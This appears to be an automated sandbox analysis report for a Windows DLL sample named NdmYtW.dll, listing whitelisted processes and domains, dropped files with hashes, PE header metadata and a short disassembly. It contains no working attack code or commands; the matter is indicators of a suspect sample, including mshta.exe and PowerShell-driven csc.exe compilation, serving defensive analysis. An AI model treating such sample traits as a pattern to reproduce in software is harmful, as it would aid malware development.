- Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.42.16, 52.168.117.173
- Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 5052 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 15:43:49 | API Interceptor | |
| 15:43:50 | API Interceptor | |
| 15:44:36 | API Interceptor |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_20e622abffa5775ef41a222dc31251babfb4527_7cac0383_1b67ca62\Report.wer
Download File
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 65536 |
| Entropy (8bit): | 0.8409462911952318 |
| Encrypted: | false |
| SSDEEP: | 96:xyq4cpnnYyIy9haWK7ESZpXIQcQGc6McE+cw3/7+a+z+HbHgfAS/YyNlISWbSm9I:xXrpnUHoIE/jCq/u7s4S274Itb5 |
| MD5: | DDF42B4E77921E63C1C10AD5F0789024 |
| SHA1: | 3F6C075E6A3DDA199566FEDDDEF475792F055ACB |
| SHA-256: | 283D5DFB4CF2D18A729FE606D7DC68415C099DFDF2D07221F675431A4FF6A6AE |
| SHA-512: | 2F55CD176AE0236DD86F4BF70BE6B62438F879ADA6ABC853B0502021C9E23C6186C9A38BDE06EF0A70DFFA20A155C35403865A3D8213617C62B3532E20F24899 |
| Malicious: | false |
| Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5fa21f6577568642ef2a26a9573ce156e4bc8_7cac0383_1b8fe099\Report.wer
Download File
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 65536 |
| Entropy (8bit): | 0.8480981812310293 |
| Encrypted: | false |
| SSDEEP: | 96:8ycXy/FNOnnYy+y9haoB7Jn7YpXIQcQGc6McE+cw3/7+a+z+HbHgfAS/YyNlISWK:85YPGngHoIE/jCq/u7s4S274ItW |
| MD5: | DC79C473569144F66452E625D5A328FB |
| SHA1: | 51F8AFEDC144BD25F6EBE3F71538EE41CAFB2789 |
| SHA-256: | A0CC449AD09639F1B85647BD896E541E20A02844B86D83A2359DC8F8CBA49FBB |
| SHA-512: | E431608DB88EF934DF261270FC3A4E59ECB401302961317A24702FBE656C06650DE25B8F68699F016810749D8BFE732970B9A1CAA612FF2869C12F4C7E704410 |
| Malicious: | false |
| Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_77fedd926fb8456368a0809e68225ec9bb4c64f4_7cac0383_11b404ac\Report.wer
Download File
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 65536 |
| Entropy (8bit): | 0.8439955761514597 |
| Encrypted: | false |
| SSDEEP: | 96:8ygrXy+rF8pSnnYyGy9haWKzfopXIQcQnc6ScETcw3b+a+z+HbHgfAS/YyNlISWK:8x3qanVHZWpXjCq/u7s4S274ItW |
| MD5: | 6EB7B27544D37A31F4B657129A82AB0C |
| SHA1: | 8C5EC95F1FAAF0BBFFCA3C760D44BF45C7894827 |
| SHA-256: | C954180768E6311A478CE247DFE76791CC90419AEC7597C9ADC30F8A4ADF4745 |
| SHA-512: | 7C5E594CB91C30EAE3131977116EBE7C1465849C0DA71475BB81FE54F141B077FA27241780B5A3BCF35D74CD815AA943A2E255A002D6D65EB20C1DB44A018AC0 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 40094 |
| Entropy (8bit): | 2.052814478681057 |
| Encrypted: | false |
| SSDEEP: | 192:25FRm5h3cXzC+OvKkX4b/3hnQ1/9IYRndN04lQ3U7brGiw:GTAhWzuvzXYE/9I0NFlQ3U72i |
| MD5: | 4C52D25E61C8140E8623DD7655BDDB42 |
| SHA1: | E0689DCF4555C3108B43C077276C84932F464140 |
| SHA-256: | 2FAE08CF2662688CA576A799FD672AEBE36D5EEDD02B8D4150F6B40BD25A7CB6 |
| SHA-512: | 747F1A5C672960502728F11169A1FBC78A3384FD092CA046A5485A0AB45247D08DC78A5EE34A6ABABD5019D3D92FC73BAC9BF1B307A8C1BF16F5000A3A315162 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 8344 |
| Entropy (8bit): | 3.6932839824056236 |
| Encrypted: | false |
| SSDEEP: | 192:Rrl7r3GLNi4N666YodSUiMBgmfNSnaCpNj89bF41fsXm:RrlsNiy666YSSUiMBgmfNSQFifB |
| MD5: | 421C5AFB7EECA2E34794A906B795C9AE |
| SHA1: | 521E9E40A39331A6D869601F1C239B1DF3CCE45F |
| SHA-256: | EFFAECCE4006CD99CB2256059F176FC62B96399C4AD93F13046832B8ADF39360 |
| SHA-512: | 620C6E0085C37817834B8734CDAC2DC14D75F5DD8D755AE9AD28738B7613177C85CE59798732E47BA547D0FBB7A89A7721CF5D239F69D7C0BCC3E8E1C760D62D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4657 |
| Entropy (8bit): | 4.42136740415334 |
| Encrypted: | false |
| SSDEEP: | 48:cvIwSD8zsnJgtWI9vC8Wgc8sqYjhh8fm8M4J2+8FD+q8vQ+J/KcQIcQw0Hd:uITfJZ1grsqY1mJwKl/Kkw0Hd |
| MD5: | 683F94C1DEF6E7B466BB6662C5BD2555 |
| SHA1: | C3DD9191D91673CD5BECAC2B25592850EE595870 |
| SHA-256: | 86732DF2A04FD69A51DF26F4E39CDAA447F76A97628C649E8A5F024FF574DEBE |
| SHA-512: | 10D3FC52C7357C7B89EB873BA62B6FC74115CDF399395D9BCB0495821F344435F9F58C03038EF88D612A382159825144CED48FDB566316687D7C13D1F811587C |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 39894 |
| Entropy (8bit): | 2.0340476772532377 |
| Encrypted: | false |
| SSDEEP: | 192:S5Uem5h3cXloCSXOvKkT4b/3hF7Jiq1IYRndN04olnOl9zNvuD4tY:SrAhWq3+vzTE9iq1I0NFolnczg4tY |
| MD5: | D7D885859E043EC0A9D1C0DAA2162FA6 |
| SHA1: | 46449A5B9ED89302F2336879322CA80DB1C9C222 |
| SHA-256: | 1BC6C40E436323D2139A5A21755CD5DC37DD783397D985A6F9BD13AC3A552F10 |
| SHA-512: | 5ACD6CB8DC7DA7B48D5A17F21B1AD4135687BF1D86597F98AAD787D27FA8A42EEE28558A702B33A7DAA5F701881518F76345E0671A9F10044A9DC732487597B5 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 8336 |
| Entropy (8bit): | 3.702225861801322 |
| Encrypted: | false |
| SSDEEP: | 192:Rrl7r3GLNi4ja6t6YogSUQ9UX3gmfpSnaCprT89bYQsfuIm:RrlsNiya6t6YPSUQ9UX3gmfpSGYjfI |
| MD5: | 6CF146A2FA4D586CF33C7EB62D4C78AC |
| SHA1: | 4EB561443A6BC954791E582F0AA9C57796F2E207 |
| SHA-256: | 371AB96D10A9E7B93E799180446B1FF07FD8C5ACBEDDAADAD3E3F45FDEAAD1FE |
| SHA-512: | 53DD12159023714176432F2B29164DFD0798540659C8CCFC5903F9F429A524FD6DAB0937F7EAA982008250046E248513B54EC1FF934419F19F89DEB6018A1160 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4598 |
| Entropy (8bit): | 4.473636450507985 |
| Encrypted: | false |
| SSDEEP: | 48:cvIwSD8zsnJgtWI9vC8Wgc8sqYjhP8fm8M4J2+eZF3k+q84lLc/KcQIcQw02d:uITfJZ1grsqY1UJMY9c/Kkw02d |
| MD5: | 48303E04EC238BBF2A031618DABE4331 |
| SHA1: | 70C14CF36A1E5AF38E620EB949EBB871D029EA75 |
| SHA-256: | AD50DFBAFF788F8D90FDA8DC2D0A1B8037D1E3C0089F0A065431AD6628BDA73F |
| SHA-512: | F2880D52D48707C92DB0BBACAECE68C7A1C1116F9428924B8E8B449F4B7EDF4B7782D63873A13836A3DC7E52214FBEB977AC161FC2000CD500D049C6F7890DF8 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 36430 |
| Entropy (8bit): | 1.900077143486334 |
| Encrypted: | false |
| SSDEEP: | 192:D5qOm5h3cXQ/kR6OvKk6KhnDndN047DISbbgK/v:VhAhWQ8Tvz6GRNF7De8 |
| MD5: | AEA9E6C21AD8AE962F40A33B9EE7F838 |
| SHA1: | 7E9AF23C22DFA14FEEF59D5954AE4786D1E642FC |
| SHA-256: | 6C2D96E60C4D106F8A3A69734917958920282E0CA09AD5F3784F0C9EF2081066 |
| SHA-512: | E9F23A79F4D934D845571E040C9E6F8AC35708D38B5A951C42A9AA8C45A2C286BA79FAAE10E03F70B4F8FF98B3D12FD6725CF4D03C73C4B21A28E04795CE8B6F |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 8286 |
| Entropy (8bit): | 3.6972809103711994 |
| Encrypted: | false |
| SSDEEP: | 192:Rrl7r3GLNi4o6o6YovSUihgmfSSVaCpDG89bwQsfcQm:RrlsNi/6o6YgSUihgmfSS/wjfq |
| MD5: | 1D78C0EC299A6D83758ED0C265152A0E |
| SHA1: | F5CDADC688247C433416D382136B19004FD08340 |
| SHA-256: | 79DFA2EEB262DB6DC67A08EF74C56BAF76D6959E6CACE677EC4775673061F2B7 |
| SHA-512: | 6297387EF30F56C9E76C224AA311FD1AF88D117AD61BF422FCEA2657296668A9DA46B628E55CCA6068504576DC5D3E4B2F74A0476A752312C7F4807AF26B39FF |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WerFault.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4556 |
| Entropy (8bit): | 4.434381969950757 |
| Encrypted: | false |
| SSDEEP: | 48:cvIwSD8zsnJgtWI9vC8Wgc8sqYjhO8fm8M4J2+3FHX5j+q84CE/KcQIcQw02d:uITfJZ1grsqY1rJbX9P/Kkw02d |
| MD5: | D7555A32FFEF5D7C2998AF262FA1361A |
| SHA1: | 2F0663A8F7B5F2DBF5D85D30001821285F28D8EE |
| SHA-256: | 84ABCCF9C74791D4DE1B1FD4AA02DCA01E3B5675CA38011196C0A32278C3590E |
| SHA-512: | 036DF7909CDD926535F9105C6A13DFD760C9B924D937184593FBDC90CF3C2485C36F9F1DA0F7076CBE6C75B059756D830AEE1AF589253B6E57A7D6CB8121CB03 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 11606 |
| Entropy (8bit): | 4.883977562702998 |
| Encrypted: | false |
| SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
| MD5: | 243581397F734487BD471C04FB57EA44 |
| SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
| SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
| SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 417 |
| Entropy (8bit): | 5.038440975503667 |
| Encrypted: | false |
| SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
| MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
| SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
| SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
| SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 371 |
| Entropy (8bit): | 5.236775870785985 |
| Encrypted: | false |
| SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923ff/Uzxs7+AEszI923ff5n:p37Lvkmb6KzfUWZE2Z |
| MD5: | D874DF30CBB88C7DBC84DB40D2AD160E |
| SHA1: | 2EB4B7298F3417FF05EB34E6AD6B4DCB765CAA18 |
| SHA-256: | 21A00B459564CA9025839901A3E31BF0C43361A4492946726F4C15269EC391F5 |
| SHA-512: | A47316FFE1D9E5B365707ECBEE99856919A85FC85FF64E2C2014A34BF73A7A0931E78CDD820E1F5B1F7871CEC32C388386FDDA1482A9FB4946582D745E547629 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3584 |
| Entropy (8bit): | 2.642281478416701 |
| Encrypted: | false |
| SSDEEP: | 24:etGShsMWWOJy853Ek0s2E7OgLdWQzbtkZf4EHOWI+ycuZhNAakSMPNnq:6huvz5UkGE7vZWQzqJ4m11ulAa3cq |
| MD5: | 09419D5F88C4024B9CF11E22C025026B |
| SHA1: | 01EC489DD5FF6BD24119C5DA7719CA04D4B381F0 |
| SHA-256: | DA4A7A4D8635E81DD55B62372BD3443C1374568287D71B591EBECF4E8838AF87 |
| SHA-512: | CF36E7A91B42183E4674C8768FCEF3BA2A3337659F97A6C3D25297F82ADB8D1B5FF54D5DE9C5764F7CB4E206BA014163C6B278DD6F8212DE8C4C65F1B5188C6A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 868 |
| Entropy (8bit): | 5.31091812522973 |
| Encrypted: | false |
| SSDEEP: | 12:xKIR37Lvkmb6KzfUWZE2cKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KztE2cKaM5DqBVKVrdFAMBJTH |
| MD5: | CF535E3924D3BB3217D1AE1DF572B529 |
| SHA1: | 95E6A3BC052F57054159748F053BBD6376586891 |
| SHA-256: | A5DBC838BE969E191FBDE02E13E0E8C3CD6BB6505F8D69E9CF942FD1BB35C2AE |
| SHA-512: | 217BFA54E795199E22A14A4A242BE76A8F2230F204A3C05A7E4B092C1A0BE4062FC7093605EED1B559C56D26FC47E854DAF03A0A6A6E2604BF5B81A2BAD9799B |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 652 |
| Entropy (8bit): | 3.0879012546007933 |
| Encrypted: | false |
| SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytYak7YnqqsNPN5Dlq5J:+RI+ycuZhNAakSMPNnqX |
| MD5: | 3A44F76AEA3EA6DEEC20735B215C3E53 |
| SHA1: | C2EA3CD328B909B5ED2851B87B66321C6B8183DA |
| SHA-256: | 44073E817A9FA3F84904234E701D4B1603F988A0B2F8B370508523D747324478 |
| SHA-512: | EC31ADF66D2BBF4DDDDFD3FD68E3F0748AE9CE23202142160DDED5F8B787997F29B6105EBE7459054367E0A1C46B3E2325AEF5B209C8F62CAEAA881B12384A75 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1332 |
| Entropy (8bit): | 3.9831582904888454 |
| Encrypted: | false |
| SSDEEP: | 24:HnzW9NyjTiuHjhKdNII+ycuZhNAakSMPNnq92d:ayjTiutKdu1ulAa3cq9G |
| MD5: | 583E041E679F56EDB683A54F1CE647B9 |
| SHA1: | 85963325F647F8744B1439BC7D205AADEF05712D |
| SHA-256: | B3FF50DCADCBD546E275463E95E5CDCBB7EDA8083441EE1026664811F81FABFD |
| SHA-512: | DBD7B61321714444C7EB0D1137B950C9294EEDBC0DE2406ADB2145192D1F1D0A1D8434C17AF3E44FE03AA7248E1AAF8260AD118567797E299C68C26A16E5EBCD |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1332 |
| Entropy (8bit): | 3.9848653254772106 |
| Encrypted: | false |
| SSDEEP: | 24:HQzW9NqTCZHChKdNWI+ycuZhNUakSQPNnq92d:PqA4Kd41ulUa3Iq9G |
| MD5: | ABA9A2FCA6D03E2CFDAD3777E19BA09B |
| SHA1: | EC808C7906F89865D9E7B9CFE89DED7C2A7422D1 |
| SHA-256: | F51BDEF4DEE31FD170ACCFF19F0F05805C5CD0D692BDDC0098915E430DB50B4E |
| SHA-512: | 66D8EA4DB7776D30C97FFF867F3A6BE6489064CBE5835EB3737892BD30ADC0E57D6FCAC671C2035E7F5D7E983549A86EB1C59EB2C6BA7DA29EDCD0A796F0B5D5 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 652 |
| Entropy (8bit): | 3.092195159275495 |
| Encrypted: | false |
| SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxAak7YnqqalPN5Dlq5J:+RI+ycuZhNUakSQPNnqX |
| MD5: | 07CF065E51F915062A992EBE067AB727 |
| SHA1: | F88C9A6625F2E25A298B199E6B9117AC4298C8B4 |
| SHA-256: | 63B69B6437EA3E3719B1BD9ED4E9E7E023B9025FEA45229944D648542188F345 |
| SHA-512: | 09A6527DF6D70F87E2BF551DD4021C9F7D6615089D1D2755D3327A07782439563E057AED9B75CA4594458EFFBC1DD143C131882DE8CA9B149B2F7EAA911A1586 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 411 |
| Entropy (8bit): | 5.082169696837192 |
| Encrypted: | false |
| SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
| MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
| SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
| SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
| SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 371 |
| Entropy (8bit): | 5.188501291376483 |
| Encrypted: | false |
| SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fbN+zxs7+AEszI923fbv9:p37Lvkmb6KzMWZE2p |
| MD5: | AB651B733DA85D4A40A5C3D435D20F11 |
| SHA1: | 315562E7938CE64C2B1EF13767DD46387EE92A7D |
| SHA-256: | A75FFD35AC9F0898666FE715BAB41E32F54A88E0AD8282731EA70FF467E58BD0 |
| SHA-512: | 6E36FD453786E3EC997288BCFA02AD7582ADD8FBA8DE06B195EDCBC3F86C41A2EA870DD46EAB3A4810D1EC87FF40816DD336166434BD14EFD79394EFA62E7294 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3584 |
| Entropy (8bit): | 2.63702343315458 |
| Encrypted: | false |
| SSDEEP: | 24:etGSEs8+mUE7R853RY0kCG6+4I4tkZfE43DZ0WI+ycuZhNUakSQPNnq:6EWXE7S50LJE4TZX1ulUa3Iq |
| MD5: | 16C8AD2346F2D0726B200C82DF31DD7A |
| SHA1: | 61B460ADA7A96672FD3E61D37B8C5C956F5BFF09 |
| SHA-256: | 48E6F7DA442EAEA16520724A4BBDA11C2C815F8FC01895F0AFD98698659AC96B |
| SHA-512: | F8966BB40698269AF78ECADE14BBD1A5EFE0F2C3B7D23749893BB4441C00BCAF3140A364668D462CDC2FDCC803FEC099ED64B4D5AD49B99E3A5C0CF3344BD4C8 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 868 |
| Entropy (8bit): | 5.302915678625349 |
| Encrypted: | false |
| SSDEEP: | 12:xKIR37Lvkmb6KzMWZE2sKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6Kz9E2sKaM5DqBVKVrdFAMBJTH |
| MD5: | 73714EBF9841358E774276C6DB685DA2 |
| SHA1: | 540FF89348D5A71BF23893067928576C4C5FB133 |
| SHA-256: | 2FF82C45A316C173CBB7C323B517991EB0800CBF2FE243389E6A6B6DDD900303 |
| SHA-512: | B2AAAD13994A270E3B201401045D41DF331E6544567A2E324F82A33EA526ACF18640840800C9958387DE37F5B07D21935B1ED840412D8C4F4718AE1336DFA044 |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 6.117929162957605 |
| TrID: |
|
| File name: | NdmYtW.dll |
| File size: | 641942 |
| MD5: | f0f0659d9838d978a8b7e7391b81c801 |
| SHA1: | 6adf95dab8d012a85ee4ed93f970d610ea2138bc |
| SHA256: | f32f9fed2539cf3a6f585bc961035ccf3a03095c1f27e688f2da2811eca045f1 |
| SHA512: | 36c19fd7430e37e8919065f9c35449567f431939a459bbf2deaf555e62116bf9594ce30924c72394216abde7227535d8a1df805145d73ffb407f34c280b0eac6 |
| SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8Z8y:+w1lEKOpuYxiwkkgjAN8Z8y |
| TLSH: | 37D4BE1B029B2102EBB6CE78A651636C54174CE09B01E2CFC9190DA395E35FBF4FA5ED |
| File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
 | |
| Icon Hash: | 74f0e4ecccdce0e4 |
| Entrypoint: | 0x401023 |
| Entrypoint Section: | .text |
| Digitally signed: | true |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
| DLL Characteristics: | TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 5 |
| OS Version Minor: | 0 |
| File Version Major: | 5 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 5 |
| Subsystem Version Minor: | 0 |
| Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
| Signature Valid: | |
| Signature Issuer: | |
| Signature Validation Error: | |
| Error Number: | |
| Not Before, Not After | |
| Subject Chain | |
| Version: | |
| Thumbprint MD5: | |
| Thumbprint SHA-1: | |
| Thumbprint SHA-256: | |
| Serial: |
| Instruction |
|---|
| jmp 00007FB310C6B46Dh |
| jmp 00007FB310C9BBD8h |
| jmp 00007FB310C6B153h |
| jmp 00007FB310C6AE0Eh |
| jmp 00007FB310C6B229h |
| jmp 00007FB310C6AC64h |
| jmp 00007FB310CA104Fh |
| jmp 00007FB310C6AD6Ah |
| jmp 00007FB310C943C5h |
| jmp 00007FB310CA4280h |
| jmp 00007FB310C9FEEBh |
| jmp 00007FB310CA5446h |
| jmp 00007FB310C6ACE1h |
| jmp 00007FB310C954FCh |
| jmp 00007FB310CA7B17h |
| jmp 00007FB310C9EDC2h |
| jmp 00007FB310C9657Dh |
| jmp 00007FB310C6B198h |
| jmp 00007FB310CAAAB3h |
| jmp 00007FB310C6AEBEh |
| jmp 00007FB310CA6679h |
| jmp 00007FB310C9CCA4h |
| jmp 00007FB310C9758Fh |
| jmp 00007FB310CA649Ah |
| jmp 00007FB310C6B135h |
| jmp 00007FB310CA2070h |
| jmp 00007FB310C99ACBh |
| jmp 00007FB310CA9BD6h |
| jmp 00007FB310C98991h |
| jmp 00007FB310C6B12Ch |
| jmp 00007FB310C6ACA7h |
| jmp 00007FB310CA31B2h |
| jmp 00007FB310CA8B2Dh |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| int3 |
| Programming Language: |
|
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
